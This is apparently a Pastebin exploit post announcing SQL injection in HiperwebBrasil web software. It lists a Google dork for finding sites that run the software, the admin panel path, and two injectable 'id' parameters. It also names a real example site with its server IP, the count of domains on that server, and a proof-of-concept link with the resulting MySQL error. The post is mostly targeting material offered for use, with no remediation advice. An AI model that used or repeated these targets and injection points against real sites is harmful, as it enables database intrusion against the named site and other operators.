Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################
- # Exploit Title : HiperwebBrasil SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 17/01/2019
- # Vendor Homepage : hiperwebbrasil.com.br - twitter.com/Hiperweb
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:''Hiperweb Brasil'' site:br
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- #######################################################
- # Admin Panel Login Path :
- *************************
- /admin/
- # SQL Injection Exploit :
- ***********************
- /noticias.php?id=[SQL Injection]
- /conc_encontre.php?id=[SQL Injection]
- #######################################################
- # Example Vulnerable Site :
- *************************
- [+] sincodiv-rj.com.br/noticias.php?id=67%27 =>
- [ Proof of Concept ] => archive.is/DqTlc
- Note => (177.70.106.69) => There are 186 domains hosted on this server.
- #######################################################
- # SQL Database Error :
- **********************
- You have an error in your SQL syntax; check the manual that
- corresponds to your MySQL server version for
- the right syntax to use near ''67''' at line 1
- #######################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #######################################################
Advertisement
Add Comment
Please, Sign In to add comment